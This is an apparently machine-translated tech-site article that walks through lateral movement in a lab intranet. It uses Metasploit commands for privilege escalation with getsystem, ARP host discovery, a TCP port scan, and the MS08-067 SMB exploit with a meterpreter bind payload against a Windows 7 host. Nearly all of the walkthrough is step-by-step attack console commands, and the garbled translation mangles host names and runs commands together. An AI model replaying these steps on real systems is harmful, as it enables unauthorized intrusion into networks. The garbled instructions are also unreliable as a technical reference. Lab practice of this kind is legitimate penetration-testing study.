In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-20 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >
Share
Shulou(Shulou.com)06/01 Report--
Big data in how to obtain the permissions of other hosts in the intranet, in view of this problem, this article introduces the corresponding analysis and solutions in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible way.
Environment: minor attack: Kali 2020, IpRom 192.168.1.133
Small acceptance: win7 x86, ippura 192.168.1.144
Small reception: win7 x64, ip: 192.168.1.130
1. Generate Trojans and monitor hosts. Refer to the previous article:
Intranet penetration-elevating permissions (taking advantage of rights enhancement loopholes)
2. Obtain the IP address of Xiao Bei.
Meterpreter > getsystem
3. Obtain the surviving hosts in the private network, taking a win03 host as an example
Meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24
4. Port scan to see which ports have been opened.
1. Select the module used:
Msf5 exploit (multi/handler) > use auxiliary/scanner/portscan/tcp
2. View the parameters to be configured:
Show options
3. Set the port to scan:
Msf5 auxiliary (scanner/portscan/tcp) > set ports 80, 135, 445, 3389, 3306.
4. Set the address of Mini recipient ip:
Msf5 auxiliary (scanner/portscan/tcp) > set rhosts 192.168.1.130
5. Execute:
Msf5 auxiliary (scanner/portscan/tcp) > run
Fifth, take advantage of the ms08_067 loophole to win the small suffering.
1. Search for ms08_067 module information
Msf5 auxiliary (scanner/portscan/tcp) > search ms08_067
2. Select the module and set payload
Msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit (windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
3. View the parameters to be configured:
Msf5 exploit (windows/smb/ms08_067_netapi) > show options
4. Set the target host and execute
Msf5 exploit (windows/smb/ms08_067_netapi) > set rhost 192.168.1.130msf5 exploit (windows/smb/ms08_067_netapi) > run's answer to the question about how to obtain the permissions of other hosts in the private network in big data is shared here. I hope the above content can be of some help to all of you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.